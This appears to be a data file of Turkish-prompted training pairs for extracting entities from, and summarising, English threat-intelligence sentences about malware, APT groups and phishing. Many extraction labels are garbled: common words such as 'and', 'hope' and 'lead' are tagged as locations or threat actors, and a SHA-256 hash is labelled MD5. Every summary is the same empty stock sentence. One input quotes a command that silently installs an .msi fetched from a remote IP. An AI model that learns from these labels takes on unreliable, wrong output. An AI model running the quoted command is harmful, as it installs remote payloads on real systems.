instruction
stringclasses
2 values
input
stringlengths
3
5.01k
output
stringlengths
10
5.79k
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
When ConfuserEx performs its obfuscation routine, one of the operations creates a watermark – a unique identifier within the software--that is present in the final binary.
tools: ConfuserEx
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The IP 174.129.157[.]251 is hosted on Amazon AWS, and Palo Alto Networks Cortex Xpanse history shows the IP had TCP port 443 open from April 29, 2022, until May 23, 2022, with a self-signed SSL certificate impersonating Microsoft Security:
IPV4: 174.129.157[.]251; location: and; location: SSL; identity: Microsoft; location: Security
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Carbanak also abuses command-line interface and DDE client-server protocol.
threat-actor: Carbanak
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The message above can be decrypted to: {"STATUS": "OK", "TOKEN": "d02153ffaf8137b1fa3bb852a27a12f8"}
location: can; MD5: d02153ffaf8137b1fa3bb852a27a12f8
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
This effectively validates the actor’s inbound password reset request, which allows the actor to then change the password To fix this vulnerability in version 1.0.472, the OctoberCMS developer changed the line of code above to use === instead of == when comparing the values of the reset code provided by the user via an HTTP POST request.
SOFTWARE: OctoberCMS
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 6.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Email us at u42comms@paloaltonetworks.com.
EMAIL: u42comms@paloaltonetworks.com
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In an earlier attack, we were able to warn the organization 24 hours before the actual phishing emails were sent.
TIME: 24 hours; attack-pattern: phishing
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
In this environment, security remains a persistent concern for cloud builders, because if not properly managed, investments can increase the digital attack surface.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
While the previous strings had the modified AmmyyAdmin binary since the source code was leaked, TA505 changed the strings in this sample to PopssAdmin.
attack-pattern: source; location: sample
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
770206424b8def9f6817991e9a5e88dc5bee0adb54fc7ec470b53c847154c22b email.exe
MD5: 770206424b8def9f6817991e9a5e88dc5bee0adb54fc7ec470b53c847154c22b
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 5.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
These compromised devices periodically connect to C&C servers that are themselves hosted on compromised WatchGuard devices.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
How a scheduled task delivers the malware to a victim's environment
attack-pattern: scheduled task
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
A few were observed displaying a fake error message requiring user click-through to continue execution.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
used the AutoFocus threat intelligence service to identify a series of phishing attacks against Japanese organizations.
SOFTWARE: AutoFocus; identity: Japanese organizations; attack-pattern: phishing attacks
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Unit 42 researchers have confirmed that the patch is effective against the WanaCrypt0r Ransomware attacks.
identity: Unit 42; malware: WanaCrypt0r
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
With the appropriate tools it’s possible to enable a single researcher to continually review and categorize new mutexes.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
It’s also possible that while AnubisSpy’s operators may also be Sphinx’s, they could be running separate but similar campaigns.
campaign: Sphinx; malware: AnubisSpy
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Calls to Action
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Today’s Protection
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Stage 4 is the final payload (analyzed in the next section).
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Microsoft recently released a patch for a critical vulnerability in Microsoft Secure Channel (aka Schannel).
identity: Microsoft; SOFTWARE: Microsoft Secure Channel (aka Schannel)
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In their spear-phishing attacks, OilRig preferred macro-enabled Microsoft Office (Word and Excel) documents to install their custom payloads that came in the form of portable executables (PE), PowerShell and VBScripts.
location: spear; attack-pattern: phishing; tools: Office; location: and; attack-pattern: PowerShell; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We received leads from the FBI that supported us in this investigation.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In early 2021, APT35 compromised a website affiliated with a UK university to host a phishing kit.
threat-actor: APT35; location: university; location: host; attack-pattern: phishing
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
However, despite these claims, there have been instances of affiliates undermining these guidelines by still opting to attack industry verticals such as healthcare and education.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
As with Bahamut applications, once downloaded and executed, it showed multiple malicious features that deal with stealing information.
attack-pattern: stealing information; threat-actor: Bahamut
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
It also contains a minimalist agent capable of exfiltrating interesting files from the device, such as the Whatsapp database.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Finally, our third algorithm uses a 94-character substitution table.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Although these are not implemented inside the BIOPASS RAT malware, we have observed two additional plug-ins that are written in Python (“getwechatdb” and “xss_spoof”) and were deployed by the threat actor to a victim who had been infected with Cobalt Strike.
malware: BIOPASS RAT; SOFTWARE: Python; tools: Cobalt Strike
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Because Google actively detects and disrupts phishing links sent via Gmail, the actors were observed driving targets to messaging apps like WhatsApp, Telegram or Discord.
location: and; attack-pattern: phishing
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
It created one legitimate project/repository (mobile-phone-project) in June 2016, derived from another generic GitHub page.
SOFTWARE: GitHub ; TIME: June 2016
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
AnubisSpy can also self-destruct to cover its tracks.
malware: AnubisSpy
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The APT33 actors then issue commands to the bots and collect data from the bots using these VPN connections.
threat-actor: APT33; location: issue; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
For example, attackers impersonate a journalist to seed false stories with other reporters to spread disinformation.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In the first quarter (Q1) of 2021, Unit 42 detected 113 different ransomware families in the wild.
TIME: (Q1) of 2021; identity: Unit 42
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
If communication with C&C fails, and if the PowerShell script is run from a command line, a few error messages written in simplified Mandarin Chinese are displayed, with a curious phrase that translates to "waiting for dragon": 无法访问本地计算机寄存器 (Unable to access local computer register) 任务计划程序访问被拒绝 (Mission Scheduler access is denied) 无法连接到网址,请等待龙 (Cannot connect to URL, please wait for dragon) 无法连接到网址,请等待龙 (Cannot connect to website, please wait for dragon) These messages may not reveal anything about the real attackers as the malware writers sometimes like to embed false flags into their programs to confuse researchers.
location: and; attack-pattern: PowerShell; location: are; location: register; location: Mission; location: Can; location: Can; location: may; location: real
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 20.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We hope that improved understanding of the tactics and techniques will enhance threat hunting capability and lead to stronger user protections across industry.
location: hope; location: and; location: will; location: hunting; location: and; threat-actor: lead; location: industry
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Instead of attachments, it had malicious URLs in the message content that lead to the download of a malicious document named fedex.doc from hxxp://www.fedexdocs[.]top/fedex.doc or hxxp://www.fedexdocs[.]icu/fedex.doc.
location: content; threat-actor: lead
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This can be an indication that these malware tools were developed by the same group.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
This malware lineup includes tried-and-tested malware families that have been upgraded, such as PlugX and Gh0st RAT, and a brand-new multistage malware family that we have dubbed PuppetLoader.
location: and; malware: PlugX; location: and; malware: Gh0st RAT; location: and; location: brand; malware: PuppetLoader
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The final command executes the download and installation of the .MSI file into C:\Windows\System32\msiexec.exe" back=13 error=continue /i http://92[.]38[.]135[.]99/99.msi /q OnLoad="c:\windows\notepad.exe Figure 24.
location: and; URL: http://92[.]38[.]135[.]99/99.msi
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Please mark, I'm not a robot!
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Looking deeper into the new methods the group uses, we found that it has an arsenal of tools capable of assessing and then compromising its targets while remaining under the radar.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
It also uses this information to determine the amount of ransom to demand, with a typical ransom demand amounting to anywhere between US$200,000 and US$2 million.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
While ConfuserEx is able to apply multiple transformations to the target binary, we are interested in two particular functions that we can use for correlation: Source code building.
tools: ConfuserEx
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Read more on the XSOAR marketplace.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
But until now, based on the latest research in the IEEE Security & Privacy paper, everyone has believed that malicious apps attempting to carry out overlay attacks must overcome two significant hurdles to be successful: These are significant mitigating factors and so overlay attacks haven’t been reckoned a serious threat.
identity: IEEE; attack-pattern: overlay attacks; attack-pattern: overlay attacks
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 1.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Sunburst is a sophisticated backdoor that provides an attacker nearly complete control over an affected system.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Trend Micro solutions Ransomware continues to be a lingering threat, something we mentioned in our last Annual Security Roundup after seeing that the number of ransomware cases we detected climbed from 55 million in 2018 to 61 million in 2019.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We would also like to thank Project Zero for their technical assistance in helping analyze these bugs.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Any service that uses SMS for authentication of information or proof that a user is authorizing a charge is vulnerable to Trojan attacks.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
There was a bug that existed in LockBit 2.0 that allowed researchers to revert the encryption process on an MSSQL database.
SOFTWARE: MSSQL; threat-actor: LockBit 2.0
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
IMAP RAT Trojan.MSIL.OCEANMAP.A Troj
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Note that the PHP code below is obfuscated.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Some commodity malware used included RedLine, Vidar, Predator The Thief, Nexus stealer, Azorult, Raccoon, Grand Stealer, Vikro Stealer, Masad (Google’s naming), and Kantal (Google’s naming) which shares code similarity with Vidar.
malware: stealer; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Our investigation shows that the attacker used other tools during the attack.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
From one of the victims where we found an rshell sample, we also found a binary belonging to the Reptile rootkit framework, a rootkit identified as part of the arsenal of Earth Berberoka.
location: sample; malware: Reptile; attack-pattern: rootkit; attack-pattern: rootkit; location: arsenal
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
1. The “notice” handler is used for checking the connection with the C&C server.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The user agent is spoofed so it appears like an outdated browser, which results in an error message and allows the attacker to enable the basic HTML view in Gmail.
SOFTWARE: Gmail
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
In these cases, the coin mining is authorized; the website informs the user that, while on the site, his or her computing resources will be used to “mine” digital currency, and the site will receive the credits.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The language is returned to its original setting when the run is finished.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The group has since earned infamy for being involved in malicious activities associated with targeted attacks, such as deploying spear-phishing campaigns and building a backdoor.
location: spear; attack-pattern: phishing; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The HTML code from the remote template is shown in Figure 1 below.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
All data will then be encrypted and sent back. Figure 8.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We hope our thorough analysis of Operation Earth Kitsune will help others with data points for attribution in the future.
campaign: Operation Earth Kitsune
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Prisma Cloud will create an alert for any system which maintains an OMI package vulnerable to the OMI critical vulnerabilities.
SOFTWARE: Prisma Cloud; SOFTWARE: OMI; SOFTWARE: OMI
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Then, it will keep running on the hosts and wait for further commands from the C&C server.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
When a site identified by Safe Browsing as harmful appears in Google Search results, we show a warning next to it in the results.
SOFTWARE: Google Search; SOFTWARE: Safe Browsing
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Many of the StealthMutant samples we have analyzed use AES-256-ECB for decryption; alternatively, an earlier variant of the loader uses XOR.
malware: StealthMutant
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
After that the exploit uses a ROP chain to overwrite the virtual function table of a sound object to gain full control.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
King added that this DOE initiative will better protect the US from cyberattacks.
identity: King; location: US
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Our recommendations: Additional resources: Avoid & Report Phishing Emails.
attack-pattern: Phishing
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Collect active directory information aio.exe
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This blog lists 13 identified security gaps that were assigned new CVE IDs found in the six most common DDS implementations, mostly concerning deployment.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Shortly after, a new round of website defacement attacks were also observed impacting Ukrainian government organizations.
identity: Ukrainian government organizations; attack-pattern: website defacement
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The command and control (C2) communication for this botnet uses HTTPS to communicate commands and binary updates between the control servers and infected systems.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
It’s worth mentioning that they are not targeting a specific e-commerce framework, but e-commerce systems in general.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
USBferry malware’s second version combined into one file
malware: USBferry; location: one
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
When we’re talking about online shopping, clearly there’s no threat here to the retailer: they’re the ones doing the attacking.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The visibility enabled by the platform allowed us as researchers to capture the extent of this ransomware’s attack chain and replicate the driver file being abused to verify its function during compromise.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Lurk compromised systems by exploiting web browser vulnerabilities via drive-by download attacks.
malware: Lurk
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The exploit chain combined an RCE in WebKit exploiting CVE-2021-1789 which was patched on Jan 5, 2021 before discovery of this campaign and a 0-day local privilege escalation in XNU (CVE-2021-30869) patched on Sept 23, 2021.
location: 1789; location: campaign; location: and; attack-pattern: privilege escalation
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
“Coin miner” code is code used to “mine” for digital currency like bitcoin.
malware: Coin miner; SOFTWARE: bitcoin
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
32c1460ba5707783f1bbaedab5e5eab21d762094106d6af8fa6b2f0f0d777c1a
SHA2: 32c1460ba5707783f1bbaedab5e5eab21d762094106d6af8fa6b2f0f0d777c1a
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Antivirus programs typically identify these apps as malware, the topic of this blog is something different and harder to detect.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
A patch resolving the issue has been posted by Atlassian.
SOFTWARE: Atlassian
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 11.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
mofagovnp.zapto[.]org
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
He claimed that once the account was sold, only the one buyer and the legitimate user would have access.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Source: Trend Micro’s Smart Protection Network
attack-pattern: Source; location: Protection
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Tropic Trooper uses exploit-laden Microsoft Office documents to deliver malware to targets.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Evasion
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
These phishing domains have been blocked through Google Safe Browsing – a service that identifies unsafe websites across the web and notifies users and website owners of potential harm.
attack-pattern: phishing; location: and; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The cdaemon module One of the modules used is called “cdaemon”.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This component includes definition of an initial C&C server.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.